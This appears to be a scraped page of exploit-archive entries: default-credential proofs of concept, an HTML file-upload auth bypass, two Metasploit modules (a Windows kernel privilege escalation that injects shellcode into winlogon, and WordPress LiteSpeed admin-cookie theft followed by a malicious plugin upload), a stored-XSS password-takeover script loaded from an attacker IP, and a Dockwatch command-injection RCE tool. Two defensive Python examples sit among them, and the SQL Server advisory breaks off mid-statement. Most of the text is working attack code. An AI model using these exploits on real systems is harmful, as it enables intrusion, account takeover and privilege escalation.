<pre><code>====================================================================================================================================<br />| # Title : food ordering and table reservation system for restaurants 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://www.kashipara.com/project/download/project2/user/2024/202404/kashipara.com_food-ordering-and-table-re.zip |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Insecure Settings : the application appears to leave a default administrative account in place after installation.<br /><br />[+] use payload : <br /><br /> Username: murja<br /> <br /> Password: 123<br /><br />[+] http://127.0.0.1/food-ordering-and-table-reservation-system-for-restaurants-master/admin/<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Beauty Parlour & Saloon Management System 1.1 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Insecure Settings : the application appears to leave a default administrative account in place after installation.<br /><br />[+] use payload : <br /><br /> Username: admin<br /> <br /> Password: Test@123<br /><br />[+] http://127.0.0.1/bpmsp/admin/dashboard.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Online Traffic Offense 1.0 Auth by Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/traffic_offense_1.zip |<br />=============================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] This HTML page is designed to remotely upload arbitrary files and modify script settings.<br /><br />[+] Line 33 : Set your target URL<br /><br />[+] save payload as poc.html <br /><br />[+] payload : <br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>Direct File Upload</title><br /></head><br /><body><br /><br /> <h2>Direct File Upload</h2><br /> <form id="uploadForm"><br /> <label for="fileInput">Select File:</label><br /> <input type="file" id="fileInput" name="fileInput" required><br><br><br /><br /> <button type="button" onclick="uploadFile()">Upload File</button><br /> </form><br /><br /> <script><br /> function uploadFile() {<br /> const fileInput = document.getElementById('fileInput').files[0];<br /><br /> if (!fileInput) {<br /> alert('Please select a file.');<br /> return;<br /> }<br /><br /> const formData = new FormData();<br /> formData.append('name', '<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>');<br /> formData.append('img', fileInput);<br /><br /> console.log("(+) Uploading file...");<br /><br /> fetch('http://127.0.0.1/traffic_offense/classes/SystemSettings.php?f=update_settings', { // Replace with your 
upload URL<br /> method: 'POST',<br /> body: formData<br /> })<br /> .then(response => response.text())<br /> .then(data => {<br /> if (data === '1') {<br /> console.log("(+) File upload seems to have been successful!");<br /> } else {<br /> console.log("(-) Oh no, the file upload seems to have failed!");<br /> }<br /> })<br /> .catch(error => console.error("(-) Error during file upload:", error));<br /> }<br /> </script><br /><br /></body><br /></html><br /><br /> <br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Local::WindowsKernel<br /> include Msf::Post::File<br /> include Msf::Post::Windows::Priv<br /> include Msf::Post::Windows::Process<br /> include Msf::Post::Windows::ReflectiveDLLInjection<br /> include Msf::Post::Windows::Version<br /> include Msf::Exploit::Retry<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Windows Kernel Time of Check Time of Use LPE in AuthzBasepCopyoutInternalSecurityAttributes',<br /> 'Description' => %q{<br /> CVE-2024-30088 is a Windows Kernel Elevation of Privilege Vulnerability which affects many recent versions of Windows 10,<br /> Windows 11 and Windows Server 2022.<br /><br /> The vulnerability exists inside the function called `AuthzBasepCopyoutInternalSecurityAttributes`, specifically when<br /> the kernel copies the `_AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION` of the current token object to user mode. When the<br /> kernel performs the copy of the `SecurityAttributesList`, it sets up the list of the SecurityAttribute's structure<br /> directly to the user-supplied pointer. 
It then calls `RtlCopyUnicodeString` and<br /> `AuthzBasepCopyoutInternalSecurityAttributeValues` to copy out the names and values of the `SecurityAttribute`, leading<br /> to multiple Time Of Check Time Of Use (TOCTOU) vulnerabilities in the function.<br /> },<br /> 'Author' => [<br /> 'tykawaii98', # PoC (Bùi Quang Hiếu)<br /> 'jheysel-r7' # msf module<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://github.com/tykawaii98/CVE-2024-30088'],<br /> [ 'CVE', '2024-30088']<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => 'win',<br /> 'Privileged' => true,<br /> 'SessionTypes' => [ 'meterpreter' ],<br /> 'Arch' => [ ARCH_X64 ],<br /> 'Targets' => [<br /> [ 'Windows x64', { 'Arch' => ARCH_X64 } ]<br /> ],<br /> 'DisclosureDate' => '2024-06-11',<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE, ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, ],<br /> 'Reliability' => [UNRELIABLE_SESSION] # It should return a session on the first run although has the potential to fail.<br /> }, # After the first run the original session will usually die if the module is rerun against the same session.<br /> 'Compat' => {<br /> 'Meterpreter' => {<br /> 'Commands' => %w[<br /> stdapi_sys_process_get_processes<br /> stdapi_railgun_api<br /> stdapi_sys_process_memory_allocate<br /> stdapi_sys_process_memory_protect<br /> stdapi_sys_process_memory_read<br /> stdapi_sys_process_memory_write<br /> ]<br /> }<br /> }<br /> )<br /> )<br /> end<br /><br /> def target_compatible?(version)<br /> # NOTE: Win10_1607 = Server2016 and Win10_1809 = Server2019. 
Both Server and Desktop versions are supposed to be affected.<br /> return true if version.build_number.between?(Msf::WindowsVersion::Win10_1507, Rex::Version.new('10.0.10240.20680')) ||<br /> version.build_number.between?(Msf::WindowsVersion::Win10_1607, Rex::Version.new('10.0.14393.7070')) ||<br /> version.build_number.between?(Msf::WindowsVersion::Win10_1809, Rex::Version.new('10.0.17763.5936')) ||<br /> version.build_number.between?(Msf::WindowsVersion::Win10_21H2, Rex::Version.new('10.0.19044.4529')) ||<br /> version.build_number.between?(Msf::WindowsVersion::Win10_22H2, Rex::Version.new('10.0.19045.4529')) ||<br /> version.build_number.between?(Msf::WindowsVersion::Win11_21H2, Rex::Version.new('10.0.22000.3019')) ||<br /> version.build_number.between?(Msf::WindowsVersion::Win11_22H2, Rex::Version.new('10.0.22621.3737')) ||<br /> version.build_number.between?(Msf::WindowsVersion::Win11_23H2, Rex::Version.new('10.0.22631.3737')) ||<br /> version.build_number.between?(Msf::WindowsVersion::Server2022, Rex::Version.new('10.0.20348.2522')) ||<br /> version.build_number.between?(Msf::WindowsVersion::Server2022_23H2, Rex::Version.new('10.0.25398.950'))<br /><br /> false<br /> end<br /><br /> def check<br /> return Exploit::CheckCode::Safe('Non Windows systems are not affected') unless session.platform == 'windows'<br /><br /> version = get_version_info<br /> return Exploit::CheckCode::Appears("Version detected: #{version}") if target_compatible?(version)<br /><br /> CheckCode::Safe("Version detected: #{version}")<br /> end<br /><br /> def get_winlogon_pid<br /> processes = client.sys.process.get_processes<br /> winlogon_pid = nil<br /> processes.each do |process|<br /> if process['name'].downcase == 'winlogon.exe'<br /> winlogon_pid = process['pid']<br /> break<br /> end<br /> end<br /><br /> winlogon_pid<br /> end<br /><br /> def get_winlogon_handle<br /> pid = session.sys.process.getpid<br /> process_handle = session.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)<br 
/> address = process_handle.memory.allocate(8)<br /><br /> thread = execute_dll(<br /> ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2024-30088', 'CVE-2024-30088.x64.dll'),<br /> address,<br /> pid<br /> )<br /><br /> calls = [<br /> ['kernel32', 'WaitForSingleObject', [ thread.handle, 20000 ] ],<br /> ['kernel32', 'GetExitCodeThread', [ thread.handle, 4 ] ],<br /> ]<br /><br /> results = session.railgun.multi(calls)<br /> winlogon_handle = nil<br /><br /> if results.last['lpExitCode'] == 0<br /> print_good('The exploit was successful, reading SYSTEM token from memory...')<br /> current_memory = process_handle.memory.read(address, 8)<br /> winlogon_handle = current_memory.unpack('Q<').first<br /> end<br /><br /> session.railgun.kernel32.VirtualFree(address, 0, MEM_RELEASE)<br /> winlogon_handle<br /> end<br /><br /> def exploit<br /> if is_system?<br /> fail_with(Failure::None, 'Session is already elevated')<br /> end<br /><br /> version = get_version_info<br /> unless target_compatible?(version)<br /> fail_with(Failure::NoTarget, "The exploit does not support this version of Windows: #{version}")<br /> end<br /><br /> winlogon_handle = get_winlogon_handle<br /> fail_with(Failure::UnexpectedReply, 'Unable to retrieve the winlogon handle') unless winlogon_handle<br /> print_good("Successfully stole winlogon handle: #{winlogon_handle}")<br /><br /> winlogon_pid = get_winlogon_pid<br /> fail_with(Failure::UnexpectedReply, 'Unable to retrieve the winlogon pid') unless winlogon_pid<br /> print_good("Successfully retrieved winlogon pid: #{winlogon_pid}")<br /><br /> host = session.sys.process.new(winlogon_pid, winlogon_handle)<br /> shellcode = payload.encoded<br /> shell_addr = host.memory.allocate(shellcode.length)<br /> host.memory.protect(shell_addr)<br /><br /> if host.memory.write(shell_addr, shellcode) < shellcode.length<br /> fail_with(Failure::UnexpectedReply, 'Failed to write shellcode')<br /> end<br /><br /> vprint_status("Creating the thread to 
execute in 0x#{shell_addr.to_s(16)} (pid=#{winlogon_pid})")<br /> thread = host.thread.create(shell_addr, 0)<br /> unless thread.instance_of?(Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Thread)<br /> fail_with(Failure::UnexpectedReply, 'Unable to create thread')<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HTTP::Wordpress<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> class DebugLogError < StandardError; end<br /> class WordPressNotOnline < StandardError; end<br /> class AdminCookieError < StandardError; end<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Wordpress LiteSpeed Cache plugin cookie theft',<br /> 'Description' => %q{<br /> This module exploits an unauthenticated account takeover vulnerability in LiteSpeed Cache, a WordPress plugin<br /> that currently has around 6 million active installations. In LiteSpeed Cache versions prior to 6.5.0.1, when<br /> the Debug Logging feature is enabled, the plugin will log admin cookies to the /wp-content/debug.log endpoint,<br /> which is accessible without authentication. 
The Debug Logging feature in the plugin is not enabled by default.<br /> The admin cookies found in the debug.log can be used to upload and execute a malicious plugin containing a payload.<br /> },<br /> 'Author' => [<br /> 'Rafie Muhammad', # discovery<br /> 'jheysel-r7' # module<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://patchstack.com/articles/critical-account-takeover-vulnerability-patched-in-litespeed-cache-plugin/'],<br /> [ 'CVE', '2024-44000']<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'Privileged' => false,<br /> 'Platform' => ['unix', 'linux', 'win', 'php'],<br /> 'Arch' => [ARCH_PHP, ARCH_CMD],<br /> 'Targets' => [<br /> [<br /> 'PHP In-Memory',<br /> {<br /> 'Platform' => 'php',<br /> 'Arch' => ARCH_PHP<br /> # tested with php/meterpreter/reverse_tcp<br /> }<br /> ],<br /> [<br /> 'Unix In-Memory',<br /> {<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => ARCH_CMD<br /> # tested with cmd/linux/http/x64/meterpreter/reverse_tcp<br /> }<br /> ],<br /> [<br /> 'Windows In-Memory',<br /> {<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_CMD<br /> }<br /> ],<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2024-09-04',<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE, ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS],<br /> 'Reliability' => [ REPEATABLE_SESSION, ]<br /> }<br /> )<br /> )<br /> end<br /><br /> def check<br /> @admin_cookie = get_valid_admin_cookie<br /> CheckCode::Vulnerable('Found and tested valid admin cookie, we can upload and execute a payload')<br /> rescue WordPressNotOnline => e<br /> return CheckCode::Unknown("This doesn't appear to be a WordPress site: #{e.class}, #{e}")<br /> rescue DebugLogError => e<br /> return CheckCode::Safe("#{e.class}, #{e}")<br /> rescue AdminCookieError => e<br /> return CheckCode::Safe("#{e.class}, #{e}")<br /> end<br /><br /> def extract_cookies(debug_log)<br /> admin_cookies = []<br /> debug_log.each_line do |log_line|<br /> # 09/13/24 15:52:48.009 
[192.168.65.1:58695 1 UNP] Cookie: wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1726415372%7C8dXTtGUqH8cjixS1ZU8k58iBmfXRK0xMHXgDZwgjPfn%7C4084023e82a4c58d574ddf33142b168ff5cb93446675ca8116fd32e1de2b8df7; wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1726415372%7C8dXTtGUqH8cjixS1ZU8k58iBmfXRK0xMHXgDZwgjPfn%7Cf6bb4d0fdca7b147f320472893374a063b095b550db3488f86e58b6c47e4ce4c<br /> match = log_line.match(/(wordpress(_logged_in)?_[a-f0-9]{32}=[^;]+)/)<br /> admin_cookies << match.captures.compact.join('; ') if match<br /> end<br /> admin_cookies<br /> end<br /><br /> def verify_admin_cookie(admin_cookies)<br /> admin_cookies.each do |admin_cookie|<br /> res = send_request_cgi({<br /> 'uri' => '/wp-admin/',<br /> 'cookie' => admin_cookie<br /> })<br /> return admin_cookie if res&.code == 200<br /> end<br /><br /> nil<br /> end<br /><br /> def get_valid_admin_cookie<br /> raise WordPressNotOnline unless wordpress_and_online?<br /><br /> res = send_request_cgi({<br /> 'uri' => normalize_uri('wp-content', 'debug.log'),<br /> 'method' => 'GET'<br /> })<br /> raise DebugLogError, 'There was no /wp-content/debug.log endpoint found on the target to pillage' unless res&.code == 200<br /> raise DebugLogError, 'There were no cookies found inside /wp-content/debug.log' unless res.body.include?('wordpress_logged_in')<br /><br /> admin_cookies = extract_cookies(res.body)<br /> raise AdminCookieError, 'No admin cookies could be found in debug.log' if admin_cookies.blank?<br /><br /> print_status('One or more potential admin cookies were found')<br /><br /> admin_cookie = verify_admin_cookie(admin_cookies)<br /> raise AdminCookieError, 'Admin cookies were found but are invalid' unless admin_cookie<br /><br /> admin_cookie<br /> end<br /><br /> def exploit<br /> unless @admin_cookie<br /> begin<br /> @admin_cookie = get_valid_admin_cookie<br /> print_good('Found and tested valid admin cookie, we can upload and execute a payload')<br /> rescue WordPressNotOnline => 
e<br /> fail_with(Failure::NotFound, "#{e.class}, #{e}")<br /> rescue DebugLogError, AdminCookieError => e<br /> fail_with(Failure::UnexpectedReply, "#{e.class}, #{e}")<br /> end<br /> end<br /><br /> print_status('Preparing payload...')<br /> plugin_name = Rex::Text.rand_text_alpha(10)<br /> payload_name = Rex::Text.rand_text_alpha(10).to_s<br /> payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")<br /> zip = generate_plugin(plugin_name, payload_name)<br /><br /> print_status('Uploading payload...')<br /><br /> uploaded = wordpress_upload_plugin(plugin_name, zip.pack, @admin_cookie)<br /> fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded<br /><br /> print_status("Executing the payload at #{payload_uri}...")<br /> register_files_for_cleanup("#{payload_name}.php", "#{plugin_name}.php")<br /> register_dir_for_cleanup("../#{plugin_name}")<br /> send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' })<br /> end<br />end<br /></code></pre>
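A defender-side check for the exposure this module relies on, added here as an example (it is not part of the Metasploit module or of the LiteSpeed project): it scans constructed Apache/nginx combined-format access-log lines for requests to wp-content/debug.log, separates the ones that were actually served from the ones the server refused, and correlates the serving client IPs with later successful /wp-admin requests, which is the sequence the module's IOC_IN_LOGS note points at. The regexes, function names and sample lines are my own.

```python
#!/usr/bin/env python3
"""Detect exposure of /wp-content/debug.log from web server access logs.

Added example, not part of the Metasploit module above. An attacker first
fetches /wp-content/debug.log, then reuses the harvested cookie against
/wp-admin/. Only a 200 with a non-empty body means the file was delivered.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Set

# Apache/nginx "combined" format: ip ident user [ts] "METHOD path proto" status bytes
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\d+|-)'
)
# debug.log directly under wp-content, or under a WordPress subdirectory install.
DEBUG_LOG_RE = re.compile(r"^/(?:[^?\s]*/)?wp-content/debug\.log(?:\?|$)")


@dataclass
class Finding:
    ip: str
    ts: str
    status: int
    size: int
    exposed: bool  # True when the log file was actually delivered


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into its fields; None if unparseable."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def scan(lines: Iterable[str]) -> List[Finding]:
    """Return every request for wp-content/debug.log, flagging served copies."""
    findings: List[Finding] = []
    for line in lines:
        rec = parse_line(line)
        if not rec or not DEBUG_LOG_RE.match(rec["path"]):
            continue
        status = int(rec["status"])
        size = 0 if rec["bytes"] == "-" else int(rec["bytes"])
        # A 200 with an empty body means the file existed but held nothing;
        # only a non-empty 200 indicates cookie material may have leaked.
        findings.append(Finding(rec["ip"], rec["ts"], status, size,
                                exposed=(status == 200 and size > 0)))
    return findings


def exposed_sources(findings: Iterable[Finding]) -> Set[str]:
    """Client IPs that received a copy of debug.log."""
    return {f.ip for f in findings if f.exposed}


def admin_followups(lines: Iterable[str], ips: Set[str]) -> int:
    """Count successful /wp-admin requests from IPs that pulled debug.log."""
    hits = 0
    for line in lines:
        rec = parse_line(line)
        if (rec and rec["ip"] in ips and rec["path"].startswith("/wp-admin")
                and rec["status"] == "200"):
            hits += 1
    return hits


# Constructed sample log (documentation-range IPs, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [13/Sep/2024:15:52:48 +0000] "GET /wp-content/debug.log HTTP/1.1" 200 48213 "-" "Mozilla/5.0"
203.0.113.7 - - [13/Sep/2024:15:52:51 +0000] "GET /wp-admin/ HTTP/1.1" 200 91200 "-" "Mozilla/5.0"
198.51.100.23 - - [13/Sep/2024:16:01:02 +0000] "GET /wp-content/debug.log HTTP/1.1" 403 199 "-" "curl/8.0"
192.0.2.5 - - [13/Sep/2024:16:05:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.9 - - [13/Sep/2024:16:09:30 +0000] "GET /blog/wp-content/debug.log HTTP/1.1" 200 - "-" "python-requests/2.32"
"""


def report(log_text: str = SAMPLE_LOG) -> Dict[str, object]:
    """Summarise one log: served copies, refused attempts, admin follow-ups."""
    lines = log_text.splitlines()
    findings = scan(lines)
    ips = exposed_sources(findings)
    return {
        "requests": len(findings),
        "served": sum(1 for f in findings if f.exposed),
        "exposed_ips": sorted(ips),
        "admin_followups": admin_followups(lines, ips),
    }


if __name__ == "__main__":
    for key, value in report().items():
        print(f"{key}: {value}")
```

A site that logs a non-empty 200 for debug.log should rotate every WordPress session (the cookies in the module's sample log line are salted per site, so changing the auth salts invalidates them) and block the path at the web server.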
<pre><code># Exploit Title: Stored XSS to Account Takeover - htmly v2.9.9<br /># Date: 9/2024<br /># Exploit Author: Andrey Stoykov<br /># Version: 2.9.9<br /># Tested on: Ubuntu 22.04<br /># Blog:<br />https://msecureltd.blogspot.com/2024/08/friday-fun-pentest-series-9-stored-xss.html<br /><br /><br />Description:<br /><br />- It was found that the application suffers from stored XSS<br /><br />- A low-level user with the "author" role can take over the admin account and<br />change its password by publishing a malicious post that references a<br />payload hosted on an attacker-controlled domain<br /><br /><br /><br />Stored XSS to Account Takeover #1:<br /><br />Steps to Reproduce:<br /><br />1. Visit "My Posts" > "Add New Post" > "Regular Post"<br />2. Enter the following payload into the "Content" field, referencing the externally<br />hosted PoC in JavaScript:<br /> <script src="http://192.168.159.191:8000/xss.js"></script><br />3. Upon visiting the blog post, the admin account password would be changed<br />to "test"<br />4. 
In the XSS payload pasted below, adjust the "passwordChangePageUrl",<br />"username" and "password" values<br /><br /><br />// JavaScript PoC<br /><br />// Function to fetch CSRF token and perform password change<br /> (function() {<br /> // URL of the password change page<br /> const passwordChangePageUrl = 'http://192.168.159.191/htmly/edit/password';<br /><br /> // Function to fetch the CSRF token<br /> function fetchCsrfToken() {<br /> fetch(passwordChangePageUrl, {<br /> method: 'GET',<br /> credentials: 'include' // Include cookies for the current session<br /> })<br /> .then(response => response.text())<br /> .then(html => {<br /> // Parse the HTML to find the CSRF token<br /> const parser = new DOMParser();<br /> const doc = parser.parseFromString(html, 'text/html');<br /> const csrfTokenInput = doc.querySelector('input[name="csrf_token"]');<br /> if (csrfTokenInput) {<br /> const csrfToken = csrfTokenInput.value;<br /> console.log('CSRF Token:', csrfToken);<br /> changePassword(csrfToken);<br /> } else {<br /> console.error('CSRF token not found');<br /> }<br /> })<br /> .catch(error => console.error('Error fetching CSRF token:', error));<br /> }<br /><br /> // Function to change the password<br /> function changePassword(csrfToken) {<br /> const postData = new URLSearchParams();<br /> postData.append('csrf_token', csrfToken);<br /> postData.append('username', 'admin');<br /> postData.append('password', 'test');<br /><br /> fetch(passwordChangePageUrl, {<br /> method: 'POST',<br /> body: postData,<br /> headers: {<br /> 'Content-Type': 'application/x-www-form-urlencoded'<br /> },<br /> credentials: 'include' // Include cookies for the current session<br /> })<br /> .then(response => response.text())<br /> .then(data => {<br /> console.log('Password change response:', data);<br /> })<br /> .catch(error => console.error('Error changing password:', error));<br /> }<br /><br /> // Trigger the CSRF token fetch and password change<br /> fetchCsrfToken();<br /> })();<br /><br /></code></pre>
<pre><code>#!/usr/bin/env python3<br /># -*- coding: UTF-8 -*-<br />#<br /># dockexec.py<br />#<br /># Dockwatch Remote Command Execution<br />#<br /># Jeremy Brown [jbrown3264/gmail] / Sept 2024<br />#<br /># Intro<br />#<br /># Dockwatch is a container management web UI for docker. It runs by default<br /># without authentication, although guidance is available on how to set up<br /># credentials for access. It has a Commands feature that allows a user to<br /># run docker commands such as inspect, network, ps. Prior to the fix, it did not<br /># restrict input for parameters, so both 'container' and 'parameters' for the<br /># 'dockerInspect' command were vulnerable to shell command injection on the<br /># container as the 'abc' user with (limited) command output.<br />#<br /># Example<br />#<br /># $ ./dockexec.py http://host:9999 "id"<br /># uid=1001(abc)<br /># gid=131(abc)<br /># groups=131(abc),281(unraiddocker),1000(users)<br />#<br /># Workaround: echo "admin:[a-FANTASTIC-password]" > /config/logins<br /># * DO NOT DO THIS: echo "" > /config/logins (* unless you want spacebar to work for user/pass)<br />#<br /># Fix: see commits 23df366 and c091e4c, kudos to the maintainers for the quick fixes<br />#<br /><br />import sys<br />import requests<br />import re<br /><br />def clean_output(output):<br /> output = output.replace('[]', '')<br /> output = re.sub(r'Error: No such object:\s*', '', output)<br /> output = output.replace('command', '')<br /> output = output.replace('test\n', '')<br /> lines = [line.strip() for line in output.split('\n')]<br /> return '\n'.join(lines)<br /><br />def send_command(url, command):<br /> endpoint = f"{url}/ajax/commands.php"<br /><br /> data = {<br /> 'm': 'runCommand',<br /> 'command': 'dockerInspect',<br /> 'container': command,<br /> 'parameters': 'test', # also affected<br /> 'servers': '0'<br /> }<br /><br /> try:<br /> response = requests.post(endpoint, data=data)<br /> response.raise_for_status()<br /><br /> match = 
re.search(r'<pre[^>]*>(.*?)</pre>', response.text, re.DOTALL)<br /> if match:<br /> output = clean_output(match.group(1))<br /> if output:<br /> print("%s" % output)<br /> else:<br /> print("No output found.")<br /> else:<br /> print("No output found in the response.")<br /> except requests.exceptions.RequestException as error:<br /> print("An error occurred: %s" % error)<br /><br />if __name__ == "__main__":<br /> if len(sys.argv) != 3:<br /> print("Usage: %s <url> <command>" % sys.argv[0])<br /> sys.exit(1)<br /><br /> url = sys.argv[1]<br /> command = "`" + sys.argv[2] + "`"<br /><br /> send_command(url, command)<br /></code></pre>
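The server-side fix pattern for this class of bug, added here as a Python example (Dockwatch itself is PHP, and this is not the code from commits 23df366 and c091e4c): the `container` and `parameters` fields are validated against allowlists and handed to `docker inspect` as an argv list with shell=False, so the backtick value the script above sends is rejected before any process starts. The function names and the accepted option set are my own assumptions.

```python
#!/usr/bin/env python3
"""Hardened handling of Dockwatch-style 'dockerInspect' inputs.

Added example, not Dockwatch's own code. The vulnerable pattern interpolated
the user-controlled 'container' and 'parameters' values into a shell command
string, so a value such as `id` (in backticks) ran as a command. The fix
shown here: strict allowlists plus argv execution with shell=False, so shell
metacharacters are never interpreted by a shell at all.
"""
import re
import shlex
import subprocess
from typing import List

# Docker container names: [a-zA-Z0-9][a-zA-Z0-9_.-]+ ; IDs are hex prefixes,
# which this pattern also accepts. Anything else is rejected up front.
CONTAINER_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.-]{0,127}$")
# Only the inspect switches a UI would legitimately send (assumed set).
SIMPLE_FLAGS = {"-s", "--size", "--type=container", "--type=image"}
FORMAT_FLAGS = {"-f", "--format"}
# A plain Go template such as {{.State.Status}} or {{json .Config}}.
TEMPLATE_RE = re.compile(r"^\{\{[A-Za-z0-9_. ]+\}\}$")


class InvalidArgument(ValueError):
    """Raised when a user-supplied value fails the allowlist."""


def validate_container_ref(value: str) -> str:
    """Return the container name/ID if it is a plausible Docker reference."""
    if not CONTAINER_RE.fullmatch(value):
        raise InvalidArgument(f"rejected container reference: {value!r}")
    return value


def validate_parameters(parameters: str) -> List[str]:
    """Tokenise the 'parameters' field and allow only known inspect options."""
    try:
        tokens = shlex.split(parameters)  # quoting honoured, metachars inert
    except ValueError as exc:  # unbalanced quotes
        raise InvalidArgument(f"malformed parameters: {exc}") from exc
    out: List[str] = []
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if tok in SIMPLE_FLAGS:
            out.append(tok)
        elif tok in FORMAT_FLAGS:
            if i + 1 >= len(tokens) or not TEMPLATE_RE.fullmatch(tokens[i + 1]):
                raise InvalidArgument("--format requires a simple Go template")
            out.extend([tok, tokens[i + 1]])
            i += 1
        else:
            raise InvalidArgument(f"rejected inspect parameter: {tok!r}")
        i += 1
    return out


def build_inspect_argv(container: str, parameters: str = "") -> List[str]:
    """Build the exact argv for 'docker inspect'; nothing here touches a shell."""
    argv = ["docker", "inspect"]
    argv += validate_parameters(parameters)
    argv.append(validate_container_ref(container))
    return argv


def run_inspect(container: str, parameters: str = "") -> str:
    """Execute the validated argv with shell=False and a timeout."""
    argv = build_inspect_argv(container, parameters)
    proc = subprocess.run(argv, shell=False, capture_output=True,
                          text=True, timeout=30)
    return proc.stdout if proc.returncode == 0 else proc.stderr


if __name__ == "__main__":
    # The last two pairs are the shapes the PoC above sends.
    for cont, params in [("web1", "--size"), ("`id`", "test"), ("web1", "test; id")]:
        try:
            print(build_inspect_argv(cont, params))
        except InvalidArgument as exc:
            print("blocked:", exc)
```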
<pre><code>Title: SQL Server Masked Data Exposure Through Brute Force Attack<br />Product: Database<br />Manufacturer: Microsoft<br />Affected Version(s): SQL Server 2014, 2016, 2017, 2019, 2022<br />Tested Version(s): SQL Server 2014, 2016, 2017, 2019, 2022<br />Risk Level: Low<br />Security Feature: Dynamic Data Masking<br />Author of Advisory: Emad Al-Mousa<br /><br /><br />*****************************************<br />Vulnerability Details and Background:<br /><br />Microsoft SQL Server has a security feature called "dynamic data masking". It is designed to redact/mask column-level values (columns containing sensitive data such as credit card numbers).<br /><br />The feature is useful, but it has many security weaknesses that organizations should be aware of. Among them is a brute-force technique against the WHERE clause to retrieve the actual (numeric) data values.<br /><br /><br /><br />*****************************************<br />Proof of Concept (PoC):<br /><br />I will create a database called demodb, create a table called dbo.COMPANY and insert dummy data into it:<br /><br />create database demodb;<br /><br />USE [demodb]<br /><br />GO<br /><br />SET ANSI_NULLS ON<br /><br />GO<br /><br />SET QUOTED_IDENTIFIER ON<br /><br />GO<br /><br />CREATE TABLE [dbo].[COMPANY](<br /><br />[COMPANY_NAME] [nvarchar](max) NULL,<br /><br />[SALES] [int] NULL<br /><br />) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY]<br /><br />GO<br /><br />USE [demodb]<br /><br />GO<br /><br />INSERT INTO [dbo].[COMPANY]<br /><br /> ([COMPANY_NAME]<br /><br /> ,[SALES])<br /><br /> VALUES<br /><br /> ('COMPANY_C','93')<br /><br />GO<br /><br />USE [demodb]<br /><br />GO<br /><br />INSERT INTO [dbo].[COMPANY]<br /><br /> ([COMPANY_NAME]<br /><br /> ,[SALES])<br /><br /> VALUES<br /><br /> ('COMPANY_A','11')<br /><br />GO<br /><br /><br />USE [demodb]<br /><br />GO<br /><br />INSERT 